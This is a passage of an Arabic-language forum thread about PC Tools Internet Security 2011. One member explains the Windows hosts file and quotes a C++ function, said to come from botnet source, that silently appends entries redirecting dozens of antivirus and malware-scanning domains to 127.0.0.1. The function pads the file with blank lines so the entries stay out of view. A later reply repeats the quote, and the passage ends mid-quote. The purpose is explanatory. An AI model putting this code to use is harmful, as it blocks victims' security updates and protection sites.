انتبهوا للقادمون من الخلف PC Tools Internet Security 2011 الرائع جداً +شرح مبسط للبرنامج+اختبار صغير

abd-rk · 20 نوفمبر 2010

اخي البرنامج ثقيل جدا جدا جدا

hamede · 20 نوفمبر 2010

abd-rk قال:
اخي البرنامج ثقيل جدا جدا جدا

اخى بارك الله فيك

انا استخدمه حالياً بالفعل

خفيف مثل النورتن

عمر صابر · 20 نوفمبر 2010

ahmadnour_555 · 20 نوفمبر 2010

hamede قال:
عزراً لا افهم قصدك بملفات الهوست ؟؟؟؟

شوف أخي محمد ...

ملف الهوست هو ملف يستخدم من طرف نظام تشغيلنا عند الاتصال بالانترنت , حيت اننا عندما نقوم بادخال عنوان موقع ما في المتصفح ك

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

متلا يتم التحقق في ملف الهوست من وجود عنوان IP مقابل لهادا الموقع , ادا تم ايجاده يتم استخدامه لفتح الموقع . ملف الهوست يكون مساره كالتالي : c:\windows\system32\drivers\etc\hosts و هو لا يقتصر على نظام الوندوز فقط بل يوجد بانظمة اخرى كاللينوكس و الماك تحت المسار etc/hosts/..

محتوى ملف الهوست غير معدل عليه يكون كالشكل التالي :

كود:

 [COLOR=#663399][FONT=courier new][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][SIZE=5][FONT=Traditional   Arabic][SIZE=5][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#0000ff][FONT=decotype thuluth][COLOR=#0000ff][FONT=decotype thuluth][FONT=Comic Sans MS][SIZE=5][COLOR=#3366cc][COLOR=#000066][FONT=verdana][CENTER] [LEFT] [FONT=Comic Sans MS][SIZE=2][COLOR=#000000]# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host[/COLOR][/SIZE][/FONT]
 [FONT=Comic Sans MS][SIZE=2][COLOR=#000000]127.0.0.1       localhost[/COLOR][/SIZE][/FONT]
[/LEFT]
[/CENTER]
[/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/SIZE][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR]

السؤال الدي سيطرحه البعض

ما علاقة هادا الملف بمجال الحماية ؟

بكل بساطة بعض الفيروسات تكون مبرمجة لتقوم ببعض التعديلات على الملف لعدة اغراض كمنع المستخدم من فتح مواقع الحماية و منع برامج الحماية من الاتصال بسيرفرات الخاصة بها لمنعها من تحديت قاعدة بياناتها ( mise a jour ) او إستبدال ip موقع google متلا والذي معظمنا يضعه كصفحة بداية بـ ip صفحة ملغومة ...

و هادا متال يوضح الفكرة , وهو جزء مقتبس من سورس كود لاحد الفيرورسات او بالاحرى بوت نت مبرمجة ب c++ :

كود:

 [COLOR=#663399][FONT=courier new][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][SIZE=5][FONT=Traditional   Arabic][SIZE=5][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#0000ff][FONT=decotype thuluth][COLOR=#0000ff][FONT=decotype thuluth][FONT=Comic Sans MS][SIZE=5][COLOR=#3366cc][COLOR=#000066][FONT=verdana][FONT=Courier New][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][CENTER] [LEFT] [SIZE=3]#include "includes.h"
#include "externs.h"
 void AddHosts() {
 // Build path to hosts file
 char szSystemDir[MAX_PATH]; GetSystemDirectory(szSystemDir, sizeof(szSystemDir));
 strncat(szSystemDir, " \\drivers\\etc\\hosts ", sizeof(szSystemDir));
 
 // Check if host entries already exist
 FILE *fp=fopen(szSystemDir, "r"); if(fp) {
  while(fgets(szSystemDir, sizeof(szSystemDir), fp) && !feof(fp))
   if(strstr(szSystemDir, "[URL="http://www.symantec.com/"] www.symantec.com[/URL] ")) {
    fclose(fp); return; }
   fclose(fp); }
 
 // Build path to hosts file
 GetSystemDirectory(szSystemDir, sizeof(szSystemDir));
 strncat(szSystemDir, " \\drivers\\etc\\hosts ", sizeof(szSystemDir));
 
 // Add host entries to the file
 fp=fopen(szSystemDir, "a"); if(fp) {
  fprintf(fp, "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");// Add extra lines so hosts are out of view.
  fprintf(fp, "\n127.0.0.1\twww.symantec.com\n");
  fprintf(fp, "127.0.0.1\tsecurityresponse.symantec.com\n");
  fprintf(fp, "127.0.0.1\tbottalk.us\n");
  fprintf(fp, "127.0.0.1\tsymantec.com\n");
  fprintf(fp, "127.0.0.1\twww.sophos.com\n");
  fprintf(fp, "127.0.0.1\tsophos.com\n");
  fprintf(fp, "127.0.0.1\twww.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tmcafee.com\n");
  fprintf(fp, "127.0.0.1\tliveupdate.symantecliveupdate.com\n");
  fprintf(fp, "127.0.0.1\twww.viruslist.com\n");
  fprintf(fp, "127.0.0.1\tviruslist.com\n");
  fprintf(fp, "127.0.0.1\tviruslist.com\n");
  fprintf(fp, "127.0.0.1\tf-secure.com\n");
  fprintf(fp, "127.0.0.1\twww.f-secure.com\n");
  fprintf(fp, "127.0.0.1\tkaspersky.com\n");
  fprintf(fp, "127.0.0.1\tkaspersky-labs.com\n");
  fprintf(fp, "127.0.0.1\twww.avp.com\n");
  fprintf(fp, "127.0.0.1\twww.kaspersky.com\n");
  fprintf(fp, "127.0.0.1\tavp.com\n");
  fprintf(fp, "127.0.0.1\twww.networkassociates.com\n");
  fprintf(fp, "127.0.0.1\tnetworkassociates.com\n");
  fprintf(fp, "127.0.0.1\twww.ca.com\n");
  fprintf(fp, "127.0.0.1\tca.com\n");
  fprintf(fp, "127.0.0.1\tmast.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tmy-etrust.com\n");
  fprintf(fp, "127.0.0.1\twww.my-etrust.com\n");
  fprintf(fp, "127.0.0.1\tdownload.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tdispatch.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tsecure.nai.com\n");
  fprintf(fp, "127.0.0.1\tnai.com\n");
  fprintf(fp, "127.0.0.1\twww.nai.com\n");
  fprintf(fp, "127.0.0.1\tupdate.symantec.com\n");
  fprintf(fp, "127.0.0.1\tupdates.symantec.com\n");
  fprintf(fp, "127.0.0.1\tus.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tliveupdate.symantec.com\n");
  fprintf(fp, "127.0.0.1\tcustomer.symantec.com\n");
  fprintf(fp, "127.0.0.1\trads.mcafee.com\n");
  fprintf(fp, "127.0.0.1\ttrendmicro.com\n");
  fprintf(fp, "127.0.0.1\tpandasoftware.com\n");
  fprintf(fp, "127.0.0.1\twww.pandasoftware.com\n");
  fprintf(fp, "127.0.0.1\twww.trendmicro.com\n");
  fprintf(fp, "127.0.0.1\twww.grisoft.com\n");
  fprintf(fp, "127.0.0.1\twww.microsoft.com\n");
  fprintf(fp, "127.0.0.1\tmicrosoft.com\n");
  fprintf(fp, "127.0.0.1\twww.virustotal.com\n");
  fprintf(fp, "127.0.0.1\tvirustotal.com\n");
  fprintf(fp, "127.0.0.1\tthreatexpert.com\n");
  fprintf(fp, "127.0.0.1\tnovirusthanks.org\n");
  fprintf(fp, "127.0.0.1\tscanner.novirusthanks.org\n");
        fprintf(fp, "127.0.0.1\tf-secure.com\n");
  fclose(fp[/SIZE]); }
}
[/LEFT]
[/CENTER]
[/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/SIZE][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR]

اظن محتوى السورس كود مفهوم حيت يقوم هادا الفيروس من التحقق من وجود ملف الهوست و يقوم بالتعديل عليه

لاحظ اخي التغيير اللدي طرأ على محتوى ملف الهوست بعدما قمت بتشغيل هادا الفيروس بجهازي ...

كود:

 [COLOR=#663399][FONT=courier new][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new] [SIZE=3]# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
 127.0.0.1       localhost
[/SIZE] [/FONT][/COLOR][SIZE=3]  
  
  
 127.0.0.1 [URL="http://www.symantec.com/"] www.symantec.com[/URL]
127.0.0.1 securityresponse.symantec.com
127.0.0.1 bottalk.us
127.0.0.1 symantec.com
127.0.0.1 [URL="http://www.sophos.com/"] www.sophos.com[/URL]
127.0.0.1 sophos.com
127.0.0.1 [URL="http://www.mcafee.com/"] www.mcafee.com[/URL]
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 [URL="http://www.viruslist.com/"] www.viruslist.com[/URL]
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 [URL="http://www.f-secure.com/"] www.f-secure.com[/URL]
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 [URL="http://www.avp.com/"] www.avp.com[/URL]
127.0.0.1 [URL="http://www.kaspersky.com/"] www.kaspersky.com[/URL]
127.0.0.1 avp.com
127.0.0.1 [URL="http://www.networkassociates.com/"] www.networkassociates.com[/URL]
127.0.0.1 networkassociates.com
127.0.0.1 [URL="http://www.ca.com/"] www.ca.com[/URL]
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 [URL="http://www.my-etrust.com/"] www.my-etrust.com[/URL]
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 [URL="http://www.nai.com/"] www.nai.com[/URL]
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 [URL="http://www.pandasoftware.com/"] www.pandasoftware.com[/URL]
127.0.0.1 [URL="http://www.trendmicro.com/"] www.trendmicro.com[/URL]
127.0.0.1 [URL="http://www.grisoft.com/"] www.grisoft.com[/URL]
127.0.0.1 [URL="http://www.microsoft.com/"] www.microsoft.com[/URL]
127.0.0.1 microsoft.com
127.0.0.1 [URL="http://www.virustotal.com/"] www.virustotal.com[/URL]
127.0.0.1 virustotal.com
127.0.0.1 threatexpert.com
127.0.0.1 novirusthanks.org
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 f-secure.com[/SIZE]
[/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR]

تم حجب اغلب مواقع الحماية عنا , و عند محاولة الدخول لاحد تلك المواقع يتم تحويلنا للايبي الافتراضي 127.0.0.1 و تظهر لنا الصفحة التالية بمتصفحنا :

-------
هناك بعض برامج الحماية تقوم بقفل ملف الهوست و منع التلاعب به ك Avira premium security suite

كما هو موضح في الصورة اسفله :

و ايضا برنامج Spybot - Search & Destroy يعطينا حالة صلاحيات ملف الهوست لكن لا يقوم بتغير شيء

-----------

ان شاء الله تكون المعلومة وصلت

هلالي جداوي · 20 نوفمبر 2010

بارك الله فيك

فيديو على اليوتيوب لإختبارات بسيطه على البرنامج

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

hamede · 20 نوفمبر 2010

ahmadnour_555 قال:

شوف أخي محمد ...

ملف الهوست هو ملف يستخدم من طرف نظام تشغيلنا عند الاتصال بالانترنت , حيت اننا عندما نقوم بادخال عنوان موقع ما في المتصفح ك

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

متلا يتم التحقق في ملف الهوست من وجود عنوان IP مقابل لهادا الموقع , ادا تم ايجاده يتم استخدامه لفتح الموقع . ملف الهوست يكون مساره كالتالي : c:\windows\system32\drivers\etc\hosts و هو لا يقتصر على نظام الوندوز فقط بل يوجد بانظمة اخرى كاللينوكس و الماك تحت المسار etc/hosts/..

محتوى ملف الهوست غير معدل عليه يكون كالشكل التالي :

كود:

 [COLOR=#663399][FONT=courier new][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][SIZE=5][FONT=Traditional   Arabic][SIZE=5][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#0000ff][FONT=decotype thuluth][COLOR=#0000ff][FONT=decotype thuluth][FONT=Comic Sans MS][SIZE=5][COLOR=#3366cc][COLOR=#000066][FONT=verdana][CENTER] [LEFT] [FONT=Comic Sans MS][SIZE=2][COLOR=#000000]# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host[/COLOR][/SIZE][/FONT]
 [FONT=Comic Sans MS][SIZE=2][COLOR=#000000]127.0.0.1       localhost[/COLOR][/SIZE][/FONT]
[/LEFT]
[/CENTER]
[/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/SIZE][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR]

السؤال الدي سيطرحه البعض

ما علاقة هادا الملف بمجال الحماية ؟

بكل بساطة بعض الفيروسات تكون مبرمجة لتقوم ببعض التعديلات على الملف لعدة اغراض كمنع المستخدم من فتح مواقع الحماية و منع برامج الحماية من الاتصال بسيرفرات الخاصة بها لمنعها من تحديت قاعدة بياناتها ( mise a jour ) او إستبدال ip موقع google متلا والذي معظمنا يضعه كصفحة بداية بـ ip صفحة ملغومة ...

و هادا متال يوضح الفكرة , وهو جزء مقتبس من سورس كود لاحد الفيرورسات او بالاحرى بوت نت مبرمجة ب c++ :

كود:

 [COLOR=#663399][FONT=courier new][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][SIZE=5][FONT=Traditional   Arabic][SIZE=5][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#0000ff][FONT=decotype thuluth][COLOR=#0000ff][FONT=decotype thuluth][FONT=Comic Sans MS][SIZE=5][COLOR=#3366cc][COLOR=#000066][FONT=verdana][FONT=Courier New][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][CENTER] [LEFT] [SIZE=3]#include "includes.h"
#include "externs.h"
 void AddHosts() {
 // Build path to hosts file
 char szSystemDir[MAX_PATH]; GetSystemDirectory(szSystemDir, sizeof(szSystemDir));
 strncat(szSystemDir, " \\drivers\\etc\\hosts ", sizeof(szSystemDir));
 
 // Check if host entries already exist
 FILE *fp=fopen(szSystemDir, "r"); if(fp) {
  while(fgets(szSystemDir, sizeof(szSystemDir), fp) && !feof(fp))
   if(strstr(szSystemDir, "[URL="http://www.symantec.com/"] www.symantec.com[/URL] ")) {
    fclose(fp); return; }
   fclose(fp); }
 
 // Build path to hosts file
 GetSystemDirectory(szSystemDir, sizeof(szSystemDir));
 strncat(szSystemDir, " \\drivers\\etc\\hosts ", sizeof(szSystemDir));
 
 // Add host entries to the file
 fp=fopen(szSystemDir, "a"); if(fp) {
  fprintf(fp, "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");// Add extra lines so hosts are out of view.
  fprintf(fp, "\n127.0.0.1\twww.symantec.com\n");
  fprintf(fp, "127.0.0.1\tsecurityresponse.symantec.com\n");
  fprintf(fp, "127.0.0.1\tbottalk.us\n");
  fprintf(fp, "127.0.0.1\tsymantec.com\n");
  fprintf(fp, "127.0.0.1\twww.sophos.com\n");
  fprintf(fp, "127.0.0.1\tsophos.com\n");
  fprintf(fp, "127.0.0.1\twww.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tmcafee.com\n");
  fprintf(fp, "127.0.0.1\tliveupdate.symantecliveupdate.com\n");
  fprintf(fp, "127.0.0.1\twww.viruslist.com\n");
  fprintf(fp, "127.0.0.1\tviruslist.com\n");
  fprintf(fp, "127.0.0.1\tviruslist.com\n");
  fprintf(fp, "127.0.0.1\tf-secure.com\n");
  fprintf(fp, "127.0.0.1\twww.f-secure.com\n");
  fprintf(fp, "127.0.0.1\tkaspersky.com\n");
  fprintf(fp, "127.0.0.1\tkaspersky-labs.com\n");
  fprintf(fp, "127.0.0.1\twww.avp.com\n");
  fprintf(fp, "127.0.0.1\twww.kaspersky.com\n");
  fprintf(fp, "127.0.0.1\tavp.com\n");
  fprintf(fp, "127.0.0.1\twww.networkassociates.com\n");
  fprintf(fp, "127.0.0.1\tnetworkassociates.com\n");
  fprintf(fp, "127.0.0.1\twww.ca.com\n");
  fprintf(fp, "127.0.0.1\tca.com\n");
  fprintf(fp, "127.0.0.1\tmast.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tmy-etrust.com\n");
  fprintf(fp, "127.0.0.1\twww.my-etrust.com\n");
  fprintf(fp, "127.0.0.1\tdownload.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tdispatch.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tsecure.nai.com\n");
  fprintf(fp, "127.0.0.1\tnai.com\n");
  fprintf(fp, "127.0.0.1\twww.nai.com\n");
  fprintf(fp, "127.0.0.1\tupdate.symantec.com\n");
  fprintf(fp, "127.0.0.1\tupdates.symantec.com\n");
  fprintf(fp, "127.0.0.1\tus.mcafee.com\n");
  fprintf(fp, "127.0.0.1\tliveupdate.symantec.com\n");
  fprintf(fp, "127.0.0.1\tcustomer.symantec.com\n");
  fprintf(fp, "127.0.0.1\trads.mcafee.com\n");
  fprintf(fp, "127.0.0.1\ttrendmicro.com\n");
  fprintf(fp, "127.0.0.1\tpandasoftware.com\n");
  fprintf(fp, "127.0.0.1\twww.pandasoftware.com\n");
  fprintf(fp, "127.0.0.1\twww.trendmicro.com\n");
  fprintf(fp, "127.0.0.1\twww.grisoft.com\n");
  fprintf(fp, "127.0.0.1\twww.microsoft.com\n");
  fprintf(fp, "127.0.0.1\tmicrosoft.com\n");
  fprintf(fp, "127.0.0.1\twww.virustotal.com\n");
  fprintf(fp, "127.0.0.1\tvirustotal.com\n");
  fprintf(fp, "127.0.0.1\tthreatexpert.com\n");
  fprintf(fp, "127.0.0.1\tnovirusthanks.org\n");
  fprintf(fp, "127.0.0.1\tscanner.novirusthanks.org\n");
        fprintf(fp, "127.0.0.1\tf-secure.com\n");
  fclose(fp[/SIZE]); }
}
[/LEFT]
[/CENTER]
[/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/SIZE][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR]

اظن محتوى السورس كود مفهوم حيت يقوم هادا الفيروس من التحقق من وجود ملف الهوست و يقوم بالتعديل عليه

لاحظ اخي التغيير اللدي طرأ على محتوى ملف الهوست بعدما قمت بتشغيل هادا الفيروس بجهازي ...

كود:

 [COLOR=#663399][FONT=courier new][COLOR=#663399][FONT=courier new][FONT=Comic Sans MS][SIZE=5][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=arial][FONT=Comic    Sans MS][COLOR=#000000][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#6600ff][FONT=simple indust shaded][COLOR=#663399][FONT=courier new][COLOR=#000000][COLOR=#0000ff][FONT=comic sans ms][COLOR=#0000ff][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][COLOR=#000000][FONT=comic sans ms][FONT=Andalus][SIZE=5][COLOR=#996600][COLOR=#663399][FONT=courier new] [SIZE=3]# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
